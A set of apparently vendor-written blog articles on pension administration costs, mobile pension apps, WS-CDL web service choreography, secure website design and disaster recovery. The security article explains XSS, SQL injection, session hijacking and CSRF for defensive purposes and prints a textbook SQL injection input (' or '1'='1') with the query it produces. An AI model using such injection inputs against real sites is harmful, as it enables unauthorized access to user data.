Giving Retirement Participants More Services And Reducing the Costs of Pension Administration


Switzerland 069The challenge of offering more retirement services, but also reducing administrative fees leaves many recordkeepers wondering how did we get here?  The main 3 drivers are:

  • Increased fee disclosure which exposes fees offset with hidden asset charges.  Administrators who heavily relied upon 12(b)1 type fees are struggling to compete with all the fees on the table.  A few administrators kept separate and fair service fees and are doing fine, but most are going to have to make dramatic cost cuts in the next year or so.  Previously subsidized administrative processes are now being forced to look at substantial and overdue rework.
  • Supporting heavy internal software builds of custom modules.  These modules were developed back in the day to support new services or prop up lagging vendors – a lot of good intentions.  However, the functionality has evolved into a commodity but the administrator is still maintaining tangled custom code which is now strangling their ability to reduce costs and adopt new features.
  • A massive paradigm change in infrastructure provisioning.  The use of cloud environments and virtual servers is common and solid – the biggest and most secure companies are moving forward full throttle.  The administrator who is trying to maintain a physical data center with blinking lights will not be able to provide the service or get control over their costs.  The cloud provisioning of secure servers have moved these costs from thousands of dollars (fully loaded) to only a few dollar per month.  And the uptime and performance far exceeds anything that the administrator has in their data center.

The solution is some basic restructuring and some correctly applied technology.  This change must be attacked with a concerted effort, but it is often best implemented in a controlled and measured manner.  Administrators who cannot address the key challenges will be out of business inside of 12 months.

  • Push more self-service to the employer and the participant.  This is typically done through newer, more flexible web portals.  The employers and participants are growing smarter every day and want to take more control over their accounts.  Many items always deemed as requiring administrator handling can now be totally handled on the web.
  • Standardize the payroll on-boarding process to remove rework, manual intervention, and errors.  Administrators are always surprised to see the incredible amount of rework that is actually happening in their back office payroll processing.  This is the most expensive process in administration and unfortunately the area with the least amount of standard processes.  A successful approach has been to actually pay employers to adopt a standard and complete interface – the key is to make the interface self-contained.
  • Move quickly toward mobile Apps.  The mobile App not only forces the administrator to look at what really matters on the screen, but it also get the participants more involved with their accounts on a daily basis.  The web is passive but mobile Apps are active.  In the next 12 months, the primary account access will move from web to mobile.  The game has already changed.
  • Deploy a common publishing database for all plan artifacts.  This includes statements, documents, forms, and reports.  The employers and participants are both looking for just in time delivery of the critical items needed – not sent but in a secure repository available when needed.  Looking around the market, there are few tools which effectively do this in the context of employers, plans, and advisors (SharePoint is not the answer).  The key is to have a file exchange mechanism where items can quickly and securely be published to any plan entity.
  • Rework and rethink the web design.  The pension webs evolved into a kitchen sink mentality with many pages, buttons, and icons – unfortunately most are never used.  The winners will scale back their webs using a hierarchical approach to focus on the happy paths.  And transition the language from industry jargon like ‘transactions’ to ‘life events’.  The user experience will be more holistic and managed through easy to understand wizards.  But the challenge is that the web screen sizes are changing from tablets to wide screen.  This means the modern website will have to use ‘responsive coding’ to tailor itself to whatever screen size the user presents – this is not just scaling, but actually changing the layout, menus, and content.

Based upon working in the trenches for many years working with industry leading software and administrators, these are the challenges and the pitfalls.  This has enabled a vision for the future and a pathway for 4 simple solutions.  These solutions can be done without big bang technology rollouts or professional service engagements.  But, it does often require a big internal cultural shift from the top down to adopt new ways of thinking and leave behind some pet projects.

Click here to find out how we are helping our client reduce costs and deliver more!

Is Your Pension Mobile Yet?


As the costs for retirement administration are forced more into the open, providers will be looking for new ways stand out in the crowd.  Participants are demanding more services, faster access to information, and drastically reduced costs.  The old model of having just delivering statements or even updating a static website will no longer keep the younger generation’s attention.  The pension world has moved past paper, through voice response, on past the web, and onto mobile.

The mobile app will allow administrators for the first time: 

  • Deeper penetration into participant base (in everyone’s hands)
  • Secure connection (deliver confidential data)
  • Intimate relationship (specific alerts)
  • Focused message (just the facts)

 However, the administrator must carefully select their app provider as this is still the mobile wild wild west:

  • There are many devices.  And the same app is not always compatible across different brands.
  • The mobile providers are rapidly changing the OS which mandates frequent updates
  • Unfortunately, there are few development tools
  • On some platforms, the app is unable to lock devices
  • Legacy back office systems do not necessary support mobile devices
  • And most importantly, it is difficult to synchronize the data with the presentation on the existing website or voice response system.

The best approach is to get an app in the market quickly in order to keep some experience and feedback.  This is not a fire and forget model like the early voice response and websites.  The apps will need to continue to evolve so avoid the temptation to wait until the perfect app can be designed and validated.  In order to get something to market quickly, consider a platform which can do the following:

  • No personal data stored on device (all transient data)
  • Use existing multi-factor authentication with existing credentials
  • Multi-factor compliance with device ID (UDID)
  • Optional to require web device approval
  • Uses SSL for data in transit

 Of course, transactions can easily be added later.  But the transaction rollout needs to be focused on what the participant would really want to manage quickly.   This is not just a duplication of the available web-based transactions.  The larger, more complex transactions are likely to still be left on the website.  However, quick changes as a result of person alert should be available on the mobile app with suitable mobile controls to make it easy for the participant in interact with their pension while they are on the go.

There are 2 approaches to the mobile market:  native mobile app and mobile website.  The mobile app takes full advantage of the local device for performance and navigation.  While the mobile website essentially uses adjusted html to simply present a smaller web.  The challenge is to avoid thinking of the mobile app as just a ‘smaller’ web.  The provider MUST rethink their presentation in terms of ONLY what the participant really needs to see as they are catching an airplane, picking up kids from school, or at lunch.  The mobile website is still heavily dependent upon bandwidth and html style navigation.  Whereas the mobile app can have much higher performance and present true mobile navigation features.  Some the better mobile apps contain the following:

  • Each App has custom skin to match web look and feel
  • Native apps maintained as simple as possible (high portability) – host based graphics
  • Screen zones tailored by host based XML (easy host-side tailoring)
  • Use real-time connectivity to back office system or alternative ODS

 The platform which drives the mobile app is the real secret.  It must deliver processed data, preferably XML, to the device.  And leave the presentation and graphics to the local app.  However, in some cases, pushing the graphics can be an advantage.  Such as bar or pie charts which are still very difficult to render in the mobile world – largely because of OS variations.  The best mobile apps will be built upon:

  • Fast aggregate single interactions (client-server)
  • No rule or data duplication
  • Use existing script based rules
  • Open system XML and XSLT (same rules and data as web)
  • Include data from alternate sources

 Beware of the imposters!  There are some mobile apps which look a lot like mobile website.  The app is basically just a container.  This gives the provider the appearance of being able to migrate code from one device to another – but all they are really moving is the web service calls and the frames.  The advertised advantage is the ability to modify the application without re-issuing the application – sounds good.  However, the distribution process for the application is so easy, streamlined, and automated that the benefit is negligible.  But the performance cost for the additional communication is high and the loss of navigational functionality is painful.  The mobile devices are more powerful than the computers many of us took to college so why not use them.  Be sure you are getting the native mobile app you deserve.

The best place to start is with the Iphone™.  Regardless of your phone preference, the reality is that Apple has the easiest and most efficient rollout path.  For example, Testflight™ makes the iterative issuance of test versions quick and simple.  The recommended strategy is to get a solid application working on Iphone and then quickly cookie cutter it out to Andriod and Windows7.  This avoids having moving requirements on 3 platforms.  If designed right, the code can be ported between platforms, but to date there is no proven code generator for a full native app.  There are some instances of scripted conversion where the app is essentially a frame using host based html, but this makes the user suffer daily for a few hours of one-time programming effort.  The rollout needs to avoid the temptation to try to develop the ‘perfect app’.  Again, this is not the world of the fire and forget.  The application management strategy needs to include a plan for continuous review and tuning.  The usage patterns and needs will continue to evolve at an ever increase pace.  So if done right, the screens and functions rolled out today will not be the same ones your community will be using in 6 months.

Then, many shops will take a look at the Ipad2.  This will be the single most revolutionary device for the Pension space in the next few years.  It is the only channel which allows high navigation and the ability to quickly tune it to the user.  However, care must be taken to not just 2x (size up) the smartphone app.  This is a DIFFERENT platform with new characteristics, not the least of which is the screen size.  The IPAD will allow administrators to skip past the paper and get direct input participants even in remote meetings.

The smartphone and IPAD applications will take our pensions mobile.  They will allow administrators to reach wider into their population and develop a far more intimate relationship with their participants.  Never has there been a channel that is available to so many people across socioeconomic lines.  The progressive administrators will be doing things like:

  • Integration with social media for ‘retirement badges’
  • Shake for sample portfolios
  • Market information for sticky use
  • Quick balance check
  • Secure alerts for key events
  • Direct enrollment
  • QR codes for quick reference information

 The smartphone allows users direct and quick access to their pension data.  And it forces providers to thin down the data to ONLY what the participant really needs to focus on.  The participant can see what matters with a click of a button.  No more remembering websites or complicated logon routines.  The mobile app is not just a scaled down version of a website.  It is a targeted and concise pension control that is at the participant’s finger tips almost 24×7.  Although participants are not yet making widespread demands for this access, it will be the single largest used channel by the end of 2012.

How to teach your web to Tango


Kangaroo 261

In the e-commerce business dance floor, the new digital jumps and jives demand real-time connections to many business steps and swings. No longer is it satisfactory to just shuffle data to update a single process overnight in batch. For example, a consumer enters a website to buy a new PC. The transaction must interact with the vendor CRM system, the vendor inventory (ERP) system, and a payment clearing service (authorize.net). The challenge is that all of the required left footed touchpoints are not necessarily listening to the same music. In order solve this tangled mess, web developers must teach their webs to tango.

In the past, these web dance steps were strictly defined and tightly coupled. The digital participants simply stepped into painted shoe prints on the cyber floor. This enabled high efficiency, but changes were difficult and expansion opportunities limited. If any system were changed, then all had to be upgraded or retested as the changes could have a wide impact. If the vendor needed to expand, it was difficult to engage other products from other vendors with system not under the local control. Our webs were being pushed to do more than 2-step, but the costs were too high to learn the more exotic dances.

The first solution was to establish “orchestration”. This is essentially a local and centrally defined model as to how the interaction will behave. Certainly, a conductor could enforce the right moves, right? The developers essentially enforced a certain structure for inputs, outputs, and error handling. This evolved into WS-BPEL (Business Process Execution Language) which can be defined as (3):

· It is a web service with runtime semantics and central control

· Abstract definition of end point protocols

· Executes the specified WSDL (Web Service Descriptive Message) message calls

· Encourages reuse of WSDL resources

But this still didn’t create the beautiful ballet we needed. The primary difference between orchestration and choreography is executability and control. An orchestration specifies an executable process that involves message exchanges with other systems, such that the message exchange sequences are tightly controlled. In other words, orchestration refers to the central control of a distributed system while choreography refers to a distributed system which operates according to choreography rules but without centralized control. (1) The challenges to the old orchestration WS-BPEL dance are:

· It requires centralized execution

· The semantics are not globally formalized

· It is not scalable as dual control and connectivity are required

· It is rigid so it is non-collaborative

Originally marketed by Oracle, Web Services Choreography Descriptive Language is a specification by the W3C defining a XML-based business process modeling language that describes collaboration protocols of cooperating peer Web Services. The XML model defines a global scenario which is long-lived and stateful without a single point of control. Each service executes its own orchestration based upon its defined role and sequence. (2) The W3C Web Services Choreography Working Group, was closed on the 10th July 2009 leaving WS-CDL as a Candidate Recommendation which is intended to (3):

· Promote a common understanding between services

· Automatically guarantee conformance which reduces cost of ownership

· Ensure interoperability through behavior contracts

· Increase robustness and utilization

· Generate code skeletons

 

The key components of WS-CDL are:

· interactions

· Channels

· Participants

· Roles

· State

WS-CDL fits on top of the new technology stack as the key glue to bring it all together and make it work in the global context (4).

The design approach is different:

· BPEL: Design the baby steps first then put them together into a waltz.

· WS-CDL: Establish the flow of the tango first then distill it into simpler moves. (From WS-CDL we can generate BPEL/Java/C# logic for each participant.)

This gives very different results (4):

  • BPEL: Participant specific viewpoints of control-flow (sequence, flow, switch, control links, exception handlers) based on the rigid imperative model
  • WS-CDL: Global reactive rules for declaratively prescribing normal/abnormal progress, based on the flexible information driven model

The components of WS-CDL are:

  • Typing. This defines the information types and location.
  • Identifying & Coupling Collaborating Participants. In other words, the XML defines the participants, their roles, and how they relate together so there is no overlap or competition causing race conditions or deadlocks.
  • Information Driven Collaborations. The key elements are the channel type, variable definitions, activities, and units of work. For example:

<variableDefinitions> <variable name=”ncname” InformationType=”qname”|channelType=”qname” Mutable=”true|false”? Free=”true|false”? Silent-action=”true|false”? role=”qname”? />+</variableDefinitions>

  • Activities. These are interactions which enable collaborating participants to communicate and align information

The end purpose of Choreography is to combine actions with common behavioral characteristics, building a unit of work. In order to list all the binary relationships the dance is often expressed in complex PI calculus notations. The notation shows alternative patterns of behavior using workunits. This enables recovery backward by using exception handling and forward by finalizing already completed activities. But it has some drawbacks (5):

• Lack of separation between meta-model and syntax. The WS-CDL specification tries tosimultaneously define a meta-model for service choreography and an XML syntax.

• Lack of direct support for certain categories of use cases. Currently, WS-CDL does not support use cases with one-to-many or multi-transmission interactions.

• Lack of comprehensive formal grounding. While WS-CDL borrows some terminology from pi calculus, there is no comprehensive mapping from WS-CDL to pi-calculus or any other formalism.

The bottom line is that Choreography complements Orchestration. Choreography is concerned with global, multi-party, peer-to-peer collaborations, between application components, distributed within or across an organizations trusted domain (5). WS-CDL can allow a developer to get their web into the global ball. However, its complex notation and broad scope may be too overwhelming for so many dancers that they just sit this one out and head for the bar.

References

(1) Business Process Execution Language. http://en.wikipedia.org/wiki/WS-BPEL

(2) Web Service Choreography. http://en.wikipedia.org/wiki/Web_Service_Choreography

(3) Web Services Choreography and Process Algebra. 29 April 2004. Steve Ross Talbot http://www.authorstream.com/Presentation/Junyo-29185-WS-CDL-Web-Services-ChoreographyandProce-ss-Algebra-Agenda-Orchestration-vs-Choreography-BPEL-as-Entertainment-ppt-powerpoint/

(4) Aggregating Web Services: Choreography and WS-CDL. Nickolaos Kavantzas, Oracle. http://www.fpml.org/_wgmail/_bpwgmail/pdf0BHcCh7tU4.pdf

(5) A Critical Overview of the Web Services Choreography Description Language. Alistair Barros. March 2005. http://search.yahoo.com/r/_ylt=A0oG7mbDOKZNOFcAzDxXNyoA;_ylu=X3oDMTEyY21kaGljBHNlYwNzcgRwb3MDMQRjb2xvA2FjMgR2dGlkA0RGUjVfODc-/SIG=14r8m9pbf/EXP=1302760739/**http%3a//bptrends.com/deliver_file.cfm%3ffileType=publication%26fileName=03%252D05%2520 

WP%2520WS%252DCDL%2520Barros%2520et%2520al%252Epdf

(6) Web Services Choreography Description Language Version 1.0. W3C Candidate Recommendation 9 November 2005. http://www.w3.org/TR/ws-cdl-10/

(7) WS-Choreography Definition Language (WS-CDL) . EBPML working group. http://www.ebpml.org/ws_-_cdl.htm

(8) http://lists.w3.org/Archives/Public/public-ws-chor/2004Jun/0024.html

Website Security Engineered into the Design


The Challenge

A website is open to the public on an anonymous basis.  It must be easy to use, but also protect both the user and the business.  A website which does not deploy reasonable security precautions is open to hacking.  Hacking is not mysterious and in some cases may be done quite easily, but can result in the following huge problems:

  • The site displaying unwanted or inappropriate messages
  • The users web identity being hijacked
  • A loss of critical data for the company
  • Public loss of confidence

A site’s security depends upon many components from the IT infrastructure down to the user’s desktop.  This discussion will assume all appropriate environment controls are in place and effective.  And the user has taken reasonable precautions.   The focus will be on the most common vulnerabilities in public facing web applications and the best practices to close the gaps.  However, there is no single countermeasure that will guarantee web security.  However, a suite of careful protections that is designed into the web architecture can deliver a reasonable level of security.

Unfortunately, HTML was originally used to simply markup documents; then, the use was expanded dramatically on the web.  Thus, by tasking it beyond its original design, many vulnerabilities have surfaced which can easily be exploited unless specific safeguards are deployed.

There are many good benchmarks for web application security designs from the SANS Institute, MITRE, and Open Web Application Security Project (OWASP) 3.0.  These guides show the most common problems and generally accepted best practice solutions.  The following discussion drills down into some of the key problem issues that often result from coding, design, or implementation errors or omissions.  The goal herein is to show how vulnerability within web applications can be limited or even prevented.  Here are the most common vulnerabilities and their reported occurrences:

Common problems

A website can be made vulnerable to attack either through ignorance, bad design, or sloppy implementation.  In some cases, the website builder is just not aware of the gaps in HTML.  A site that is well designed from the ground up with the common problems in mind will have few problems.  But it all requires careful and thoughtful implementation and testing for a complete security umbrella.  Some of the most common issues that a good design must guard against are:

  • Failure to preserve the web page integrity which opens the door for the insertion of cross site scripting (XSS).  This occurs whenever a site accepts input directly without sufficient validation.  The malicious input is typically a script which can steal the user’s session identity, display unauthorized messages, and/or collect unauthorized data.  The injection is typically done with short scripts using common languages, such as javascript.  The vulnerability exploits the trust the user has in an existing site.  The approaches are:
    • Non-persistent or reflected –script commands used immediately to generate page content to collect information about the site.
    • Persistent or stored – script commands imbedded in comments on a site to collect information about other users
    • DOM (Document Object Model) – client-side hijacking during the assembly of the html, typically with error messages.

A typical example:

  • Failure to preserve SQL query structure (SQL injection) within the page.  This occurs most commonly where a site uses resolved SQL commands to collect data from a host database.  This is where the SQL commands contain variables which are populated by user input.  However, the attacker realizes this by examining the page source; then inputs additional commands as the input.  The input simply terminates the existing SQL command prematurely and inserts their request with valid SQL query structure.  The newly expanded SQL query is included in the execution of the original SQL code, which returns the information the attacker requested.  This gives an attacker an opportunity to search the site database for progressively deeper and deeper information.  Items that can be retrieved and/or modified include:

 

  • List of users
  • User credentials
  • Change user’s email

 

Input: username

“’’ or ‘1’=’1’

statement = “SELECT * FROM users WHERE name = ‘” + userName + “‘;”

becomes SELECT * FROM users WHERE name = '' OR '1'='1';

 

 

 

  • Inadequate session management invalidates the authentication and rights controls for the website usage.  When a user is initially authenticated upon entering a site, they are provided a session ID (SID).  However, the challenge is how to store and pass the SID between pages as the user navigates the site.  This is necessary because HTML is essentially stateless without additional controls.  There are 3 methods to provide state to a set of pages:
    • Get Method.  This simply passes the  ID in the query strin http://mysite.com/page1.aspx?session=123456789
    • Post Method.  In this case, the SID is contained in the input, select, and text form tag in the html page.
    • Cookie.  This writes the SID to the local browser temporary space.  Modern browsers do a better job of restricting access to the SID to only the authorized and originating site, but older browsers have big gaps.  However, the access control significantly depends upon the data in the Cookie.

All of these methods can be made secure or insecure depending upon the application.   According to the SANs institute, “all of the methods can be made reasonably secure through intelligent design.”

The vulnerability exists when a valid SID is stolen or an imposter SID is created.  The goal of many of the site attacks is purposely to get a SID.  In other cases, weak sites are developed with downloaded widgets to create the site SIDS; however, the construction of SIDS using public domain tools is often predictable.  There are several web resources available to show the construction of SIDs for many popular web frameworks.

  • Cross-site request forgery (or CSRF) is where the user’s browser is tricked into sending unauthorized requests to a target site on the user’s behalf without any action on the part of the user.   A malicious instruction set is placed in a public forum, often in an image, which gives hidden instructions to the browser acting as a deputy for the user.  As an example, the scripts can request the browser to:
    • logon to sites on behalf of the user
    • send out weak stored passwords and SIDs
    • engage transactions

Fortunately, the most damage CSRF can inflict is only when the user is simultaneously logged onto the attacking site and the target site.  However, multiple site browsing is common.

  • Clear text transmission of sensitive information can expose both user and site data.  This problem can arise either between the desktop browser and web; or between the web server and the database host.  The most critical zone is the public internet space between the end user and the website.  While in route the data can travel through many hops and be deposited many caches and logs.  This is where it is vulnerable to sniffers and other monitors.

 

 

Application Best Practices

The following are common methods used to minimize the most common web vulnerabilities.  There is not one single element that will make a website secure; however, when taken in combination with active monitoring, a website can be made reasonably secure.  A website must be designed to:

Contain strong field validations on ALL input

All inputs must be validated.  The simple form of validating using escaping of string input is a good start, but it is not sufficient.  This is the process of simply replacing the 5 significant html characters.  Unfortunately, the scripting variations are too complex and clever. 

  • The simplest control is to limit the field size for ONLY the expected input.  The inputs must be validated for length, type, and syntax before being used or displayed.
  • Then only look for and accept the values expected (referred to as a white list).  As it has not proven to be successful to sanitize the input, it is best to simply reject invalid input.
  • And if still needing additional validation, use the Microsoft .Net XSS Library 1.5

As it is impossible to eliminate the use of cookies, the cookies must be protected as much as possible.  The cookies can be set to only allow access to the originating IP and for http only requests.  However, there are still exceptions around these protections. 

Use a strong output encoding for all pages generated such as (such as ISO 8859-1 or UTF 8). Do not allow the attacker to select it.

Deploy a Strong Session Management Strategy

Building in a strong session management approach will significantly limit the exposure if the site is penetrated by one of the other vulnerabilities.  And conversely, no additional controls, including encryption, can compensate for weak session management.  The basic logon controls usually start out solid, but often times the gaps occur when implementing ancillary functions such as logout, timeout, remember me, and keep alive.  The best methods for maintaining control of the session are:

  • Store only general information in the SID.  Even if hashed, do not store any user credentials as part of the SID.
  • If using the GET METHOD, use referrer filtering.  This simply means washing each page through a link filter page so the referring page is dropped.  Without this step, the SID remains part of the page because of the referring page.  However, some graphics and advertisements can still thwart this protection.
  • Verify that public error message and crash dumps do not contain the SID.
  • Automatically expire SIDs after a period of inactivity or absolute time.  This also means not allowing users to inherit an existing open SID or provide a SID.  If the user logs on and a SID is still open, it must be expired and a new one generated.  A site must be ‘strict’ about assigning a unique SID to each user.  (A permissive site accepts user supplied SIDs or allows inheriting SIDs.)  The reason sites do not allow multiple concurrent logons is to make it possible to determine if a SID has been stolen or duplicated.
  • Use a strong SID construction of at least 32 characters. This means there 2.27e(57) number of possible combinations – that is sufficient.  It is best to use built in SID generators that come with many of the popular platforms and avoid home grown controls or downloaded widgets.
  • Manage the generated SIDs on the server side within a database.  Do not store them in a temporary location subject to alternate rights authentication.  It is best to also hash the SIDs within the database to force their use only through the application.
  • Build in a logging and alerting system to record attempted uses of expired SIDs.  This will aid in the detection of a site attack and also identify the presence of a DoS (Denial of Service) attack.  This is accomplished by sending invalid SIDs to the system to force the logout of legitimate users.
  • Every page should have a ‘Logout’ button which is clearly displayed.  Too many sites in their effort to keep users on the site make the logout button difficult to find.  Thus, all too many users simple close the browser window and rely upon the SID timeout.

Deploy Forging Prevention

A site must recognize that it may be subject to automated actions on behalf of users.  These CSRF actions often have tell-tale signs that can be recognized and stopped.  A site is less exposed to unauthorized deputy actions when it:

  • Does not rely solely upon a cookie
  • Requires and validates the HTML referrer.  This is the tag in each request showing the page where the user request originated.
  • Uses of additional transaction confirmation authentication.  This is common when changing a password, but can also be used upon confirmation of a final purchase or action.  The use of multiple factor authentication such as a random picture code effectively disables unattended scripted actions. 

Use Secure Socket Layer (SSL)

In today’s world, secure transmission is largely handled by Secure Socket Layer (SSL).  This is a 3rd party certificate used to encrypt the data in transit.  It is observed with an https: address.  This virtually handles the communication in the public internet zone.  However, it does not handle the connection between the web and the database host.  This connection can be secured by using a closely routed switched network and setting the NIC interfaces to non-promiscuous mode.  In this manner, internal networks are substantially secure (except for WAN).  However, some implementations are looking at transmission encryption on the backside.  This can be done with Microsoft’s transparent data encryption for SQL 2008 (TDE).

Explore Alternative Measures

In some cases, users may opt to suspend scripting on their browser.  However, this eliminates much of the modern functionality demanded for usability.  There are domain/zone based controls for client-side scripting but this requires advanced knowledge and skills that are usually unavailable to the average user.  So scripting is probably here to stay, but a site can still educate the users on best practices and show them how to properly identify the official site.

Use Intermediary Page Generation Handlers

For new websites, the best approach is to architect the site engine to use an intermediary page assembler.  This processor accepts only expected input parameters, consumes the XML data from various sources, adds static content, and then responds with the HTML page.  The user inputs from the browser are never directly used by the page or SQL.  Instead, the specific user inputs are validated and used in a managed replacement process to generate dynamic actions.  This buffer not only makes it difficult for the attacker to see how the variables are used, but prevents unexpected inputs from getting into the final assembly and being executed.   An example of this secure modular web framework is used by Planserve Data Systems.

 

Conclusion

The purpose of this discussion is to help application developers avoid the common issues when designing, coding, and implementing an external facing web application.   These items must be considered before the first page is constructed or the site colors picked.

Before going into production, every website should be subjected to a thorough ‘penetration’ test.  There are several 3rd parties and tools which can be used to conduct an independent test.  However, it is costly and difficult to address vulnerabilities found at late stages of a web deployment project.  Any mitigation steps at that point are likely to be patchwork workarounds which will either fail or introduce other vulnerabilities. 

In order to prevent this project nightmare, the discussion here presented methods to address or mitigate the common vulnerabilities during the initial design and architecting of the site.  The site security must be baked in from the initial design all the way through to the final implementation.  If these key measures are implemented in a structured manner, the site will be reasonably secure.

 

References

 

http://msdn.microsoft.com/en-us/library/aa973813.aspx

http://en.wikipedia.org/wiki/Cross-site_scripting

http://www.sans.org/reading_room/whitepapers/webservers/secure-session-management-preventing-security-voids-web-applications_1594

http://www.bestsecuritytips.com/xfsection+article.articleid+169.htm

http://www.cgisecurity.com/owasp/html/guide.html#id2843025

http://www.owasp.org/index.php/Top_10_2007

http://www.acunetix.com/websitesecurity/xss.htm

www.planserve.net

www.hackthissite.org

Disaster Recovery is dead


If your IT shop is less than perfect, you are already an expert in disaster recovery at many levels.  The reason is the faulty way applications have traditionally been implemented.  This means continuing to spend more and more time with recovery efforts, but still not often getting the results the business demands.  The disaster recovery plans are a lot like elephant repellant in New York city; the effectiveness remains really unknown until it is too late.  Fortunately, disaster recovery will no longer be needed after the end of 2011.

The doubters will be quick to point out high availability is now a standard business expectation.  The systems have to stay up.  The perceived demands on IT continue to inflate.  But what is the business really demanding?  Do the customers really want to pay for it? Or is the overhead of disaster recovery just to avoid employee inconvenience or to provide executives with plausible deniability?  The challenge is IT staffs have fallen into a tradition of separating application design, implementation, and recovery.   The failure of this approach is catastrophic:

  • Budget-minded small to midsized businesses (SMBs) once viewed business continuity (BC) planning as an expensive luxury. Not anymore. Upgrading disaster recovery (DR) capabilities is a major priority for 56% of IT decision makers in the U.S. and Europe, according to Forrester Research Inc.‘s.
  • While companies think they’re immune to any long-term outage, more than one-fourth of companies have experienced a disruption in the last 5 years, averaging eight hours, or one business day. Source: Comdisco Vulnerability index
  • The U.S. Department of Homeland Security says one in four businesses won’t reopen following a disaster.

But what is a Disaster Recovery Plan?  If you ask IT staff, it is rebuilding boxes.  If you ask, the communications manager, it is re-establishing connectivity.  If you as the PM, it is a large collection of nicely formatted documents.  So which of the following is a disaster recovery plan?

  • Backup Tapes
  • Document
  • Software
  • Contracts
  • Recovery site
  • Server Virtualization

Perhaps, we find that it is really none of the above.  The individual items will lead us to an overly narrow view of the effort.  And lead us away from the business.  We will find that an ounce of prevention is worth a terabyte of cure.

In order to better understand of the needs of recovery, we need to first look at the types of disasters and the likelihood of each occurring.  We are all familiar with the dangers of a hurricane – obviously bad for business.  But what is equally as damaging is a business user posting the same address to all participants or dropping a billing table.  Which is more likely to occur on our watch?  Should the recovery effort really be any different?  The new view of disaster recovery will address both situations with the same solution.

 

To address these needs, there are various types of recovery strategies.  In fact, ALL companies have a fully functioning disaster recovery plan; the only difference is the result the plan achieves.   The following are common types of plans.  In order to protect the guilty, the businesses using each have been omitted.

  • Denial
  • Bunker
  • Copy
  • Nuclear
  • Active (right answer)

Which type of plan do you believe you have?  Do all members of your company have the same impression?  Incredibly, more than 44% of the companies with a workable disaster recovery plan have NOT informed anybody about the plan?  Why?  Is it because they don’t believe it will work or don’t want to take responsibility for it?  It is easy for the CEO to buy into the idea that they have done their ‘due diligence’ by spending a ton on a nuclear scheme.  But is spending a real bench mark for recovery?  In fact, some of the best recovery plans can be done quite affordably.  The key is to have an active resilience plan that is utilized on a daily basis.

It is the business…stupid.  Too often, IT staffs have discussed IT disaster recovery in terms of recovering servers rather than business value.  What of the following should we be focusing on?

  • Backups
  • Disaster Recovery
  • Business Continuity (right answer)

The most powerful metric:  “Are you trying to avoid employee inconvenience with your requested service levels?”  IT staff are all too often the guy with the hammer looking at all problems as nails.  We forget that business was dutifully conducted before faxes, emails, ETL, and mobile phones.  What is really critical to the business?  And how can it be done in a pinch with a manual solution?  All too often the first question is how do we replicate the databases all over the planet, when the question we should be asking is:  how can we call the customers?  The real need is to establish business continuity.

We can distill the needs by looking at common terms in the recovery business.  But we cannot accept the representations of the primary uses as gospel.  All uses will say their functions must be 100% at all times with no possibility of any data loss: really?  But this is seldom the truth from a core business perspective.

  • Recovery Time Objective – Time required to recover critical systems to a functional state, often assumed to be “back to normal” for those systems designated as mission critical.
  • Recovery Point Objective – Point in time to which the information has been restored when the RTO has elapsed and is dependent upon what is available from an offsite data storage location.

 

The Test

A great test is to ask the staff if they are willing to take a 10% pay decrease to build out a nuclear infrastructure.  When faced with making the decision personal, it is amazing the clever workarounds people are capable of.  This forces the conversation away from how to build bigger IT plants to how achieve business continuity. 

Another overlooked test is to ask the customer.  But you have to ask the customer the right way.  If you simply ask if they want everything all the time, then the answer will be yes.  But say, if you gave your bank customer the following options:

  • Be guaranteed they can access their account 24×7, but have fees of $200 a month (the fees are there whether advertised or not).
  • Have a strong availability but accept if the access is down from time to time, but they will get a credit of $400 a month in their account (yes the swing is 2x).

Some recovery experts suggest categorizing applications.  They are usually project managers or consultants looking for work.  Or we can break out a crystal ball and try to prioritizing the impact.  This usually results in a massively huge cost (think infinity).  This approach is widely used by hardware sales agents trying to sell a nuclear gizmo.  However, this thinking is flawed in that more and more portal data is interconnected.  A portal may consume both high priority and low priority data.  But has your portal been tested to function WITHOUT the low priority data?  A silo view is no longer practical because virtually everything is interconnected.

So then, should we simply replicate everything?  Well, although more and more shops technically have all of their data replicated to a DR location, it is not readily usable by applications because it is not in sync. As a result, database administrators and application specialists need to spend additional hours, sometimes days, reconciling data and rolling databases back to bring the various data components into alignment. By the time this effort is complete, the desired recovery window has long since been exceeded.

The hard part is not rebuilding the box.  The most common mistake businesses make when determining service-level requirements is trying to keep the business running as if nothing happened.  The point is not that some new cool technology like clouds and SANs are not useful, but rather that the usage needs to be designed into the application deployment.  If it is designed as an afterthought and assigned to another department, the costs will rise and the effectiveness will drop.

You have to make sure your disaster recovery plan will work with or without the internal key people who developed it. If the director in charge of financial ERP applications wrote the plan, for example, ask the business intelligence manager to test the recovery.  The biggest bottleneck to any recovery is not the applications or the data, but rather the key people who know how the proprietary tools were configured for your shop.  If a hurricane hits, your staff needs to be focused on their families, not your CRM systems.

The secrets to success

  • Build resiliency into the design – Keep the architecture simple.
  • Build before planning
  • Reverse the offsite co-location so that the primary location is remote and the recovery is local.
  • Include key vendors in the plan so that they can provide assistance.
  • Use offshore resources to daily validate and bring current secondary sites on a daily basis – routine failovers.
  • Make high availability the responsibility of everyone – business and IT.

 

The secrets to failure

  • Depend upon familiar local resources
  • Plan before building
  • Use complex technology that inserts more moving parts into the daily operations
  • Prepare thick complex manuals.
  • Designate a special recovery team
  • View the recovery in terms of hardware
  • Test the process annually over a 1-2 day period.
  • Forget unique needs of legacy applications.
  • Assume each application is an independent silo

Where should you spend money?  Too often, IT staffs have discussed IT disaster recovery in terms of recovering servers rather than business value.  We are all familiar with the extreme costs of moving from .99 of uptime to .9999.  But let’s say it a different way:  it is easy to overspend trying to eliminate short downtimes.  In reality, the business impact is fairly low.  And we probably do not spend enough making darn sure we can avoid long term downtimes.  Ironically, many of the nuclear solutions insert so many moving parts to allow us to be instantly available, that when they fail, we are usually down for days or weeks.  It is easy to under spend trying to protect from the big impacts.

Where to spend too much money?

  • Overprotecting data that is not critical to the business daily needs
  • Fail to maintain disaster recovery plans
  • Test disaster recovery plans too often
  • Overlook the benefits of server virtualization
  • Reluctance to renegotiate with disaster recovery service providers
  • Rely on technology as a silver bullet
  • Engage a consultancy to do a detailed plan

 

How to save money?

  • Identify all of the costs
  • Determine the assumptions
  • Review the cost allocation
  • Build the recovery cost into the implementation

Clearly, the costs for distinct disaster recovery spending are trending upward.  It is going up, because it cannot deliver the results.  When we have the recovery effort assigned to a separate team or department, the right people are not bearing the costs of the availability.  And thus we cannot get unbiased feedback on the real needs.  As the costs for availability become baked into implementations, the costs as a separate line item evaporate.  And the overall spend actually is reduced because it is cheaper to build it in once, than design and implement it twice.

